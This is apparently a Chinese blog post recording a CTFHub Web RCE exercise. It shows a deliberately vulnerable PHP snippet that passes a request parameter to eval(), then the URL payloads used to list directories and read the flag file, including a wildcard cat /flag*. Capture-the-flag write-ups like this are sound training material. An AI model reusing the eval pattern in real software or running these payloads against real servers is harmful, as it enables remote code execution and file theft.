CTFHub 技能树 Web RCE eval执行(学习记录)

马船长2024-12-15 17:23

eval执行

源代码

php 复制代码 
<?php
if (isset($_REQUEST['cmd'])) {
    eval($_REQUEST["cmd"]);
} else {
    highlight_file(__FILE__);
}
?>

PHP代码显示,要求将命令赋值给cmd然后执行

先查看一下根目录文件 /?cmd=system("ls");

查看上一级目录找flag文件

/?cmd=system("ls /");

打开flag文件发现FLAG

/?cmd=system("cat /flag_9237");

linux在读取flag的时候可以使用*去匹配

cat /flag*

/?cmd=system("cat /flag*");

相关推荐
小智RE0-走在路上17 小时前
Python学习笔记(13) --Mysql,Python关联数据库
数据库·python·学习
m0_6380796217 小时前
电气工程及其自动化导论(课程论文/报告)
学习·学习方法
四谎真好看17 小时前
MySQL 学习笔记(进阶篇3)
笔记·学习·mysql·学习笔记
小龙17 小时前
【学习笔记】模型的权重数据到底是干嘛的
人工智能·笔记·学习·权重
代码游侠17 小时前
应用——Linux FIFO(命名管道)与I/O多路复用
linux·运维·服务器·网络·笔记·学习
好奇龙猫17 小时前
大学院-筆記試験練習:数据库(データベース問題訓練) と 软件工程(ソフトウェア)(1)
学习·大学院
studyForMokey17 小时前
【跨端技术】React Native学习记录一
javascript·学习·react native·react.js
先生沉默先17 小时前
串口通信学习,使用winform读取串口发送数据,(2)
学习·c#·串口
YJlio17 小时前
CSDN年度总结2025:技术逐梦不止,步履坚定向前
windows·学习·流程图
stella·17 小时前
服务器割接,我所学习到的内容。
linux·运维·服务器·学习·shell·割接
热门推荐
01GitHub 镜像站点02从快手“12·22”直播攻击事件看:一次教科书式的业务层饱和攻击03电脑检测软件—图吧工具箱04Linux下V2Ray安装配置指南05Web安全中SQL注入绕过WAF的具体手法和实战案例063D 圣诞树网页代码07UV安装并设置国内源08jdk21下载、安装(Windows、Linux、macOS)09SQLmap 完整使用指南:环境搭建 + 命令详解 + 实操案例10在VSCode配置Java开发环境的保姆级教程(适配各类AI编程IDE)